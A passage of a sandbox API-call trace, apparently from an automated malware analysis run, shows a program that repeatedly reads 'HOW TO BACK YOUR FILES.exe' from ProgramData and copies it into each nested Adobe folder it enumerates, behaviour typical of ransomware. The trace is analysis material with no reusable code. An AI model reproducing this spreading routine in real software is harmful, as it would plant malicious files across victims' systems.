(lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.603] GetLastError () returned 0x0 [0091.603] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.603] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.603] CloseHandle (hObject=0x120) returned 1 [0091.603] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.603] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.603] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.603] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.603] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.604] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.604] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.604] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned 96 [0091.604] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.604] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.604] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\arm\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.604] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.605] GetLastError () returned 0x0 [0091.605] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.605] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.605] CloseHandle (hObject=0x120) returned 1 [0091.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.605] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.605] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.605] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.605] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f4fc8 | out: hHeap=0x2b0000) returned 1 [0091.605] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0091.605] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned 110 [0091.605] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0" [0091.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\arm\\reader_10.0.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.606] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.606] GetLastError () returned 0x0 [0091.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.606] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.606] CloseHandle (hObject=0x120) returned 1 [0091.606] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.606] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.606] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x67f06480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x67f06480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.606] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.606] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.607] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40a8 | out: hHeap=0x2b0000) returned 1 [0091.607] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.607] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned 100 [0091.607] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat" [0091.607] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.607] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\acrobat\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.607] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.608] GetLastError () returned 0x0 [0091.608] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.608] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.608] CloseHandle (hObject=0x120) returned 1 [0091.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.608] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.608] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.608] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.608] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.608] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.608] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.608] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned 105 [0091.608] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0" [0091.608] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.608] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.609] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.609] GetLastError () returned 0x0 [0091.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.609] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.609] CloseHandle (hObject=0x120) returned 1 [0091.609] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.609] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.609] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.609] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.609] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.610] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0091.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.610] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned 115 [0091.610] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate" [0091.610] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.610] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.610] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.611] GetLastError () returned 0x0 [0091.611] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.611] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.611] CloseHandle (hObject=0x120) returned 1 [0091.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.611] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.611] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cfe13c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cfe13c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.611] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.611] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.611] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0091.611] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.611] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned 124 [0091.611] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security" [0091.611] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.611] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\application data\\adobe\\acrobat\\10.0\\replicate\\security\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.612] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.612] GetLastError () returned 0x0 [0091.612] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.612] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.612] CloseHandle (hObject=0x120) returned 1 [0091.612] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.612] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.612] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Application Data\\Adobe\\Acrobat\\10.0\\Replicate\\Security\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x680f5660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x680f5660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.612] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.612] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.613] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe" [0091.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0091.613] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ba8 | out: hHeap=0x2b0000) returned 1 [0091.613] lstrlenW (lpString="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe") returned 75 [0091.613] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe" | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe" [0091.613] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0091.613] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\application data\\application data\\application data\\adobe\\how to back your files.exe"), bFailIfExists=1) returned 0 [0091.614] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0091.614] GetLastError () returned 0x0 [0091.614] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0091.614] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0091.614] CloseHandle (hObject=0x120) returned 1 [0091.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0091.614] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0091.614] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x4cf6efa0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4cf6efa0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0091.614] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0091.614] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0091.614] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM") returned="C:\\Users\\All Users\\Application Data\\Application Data\\Application Data\\Adobe\\ARM" [0091.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d7700 | out: hHeap=0x2b0000) returned 1 [0091.614] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0091.614] lstrlenW 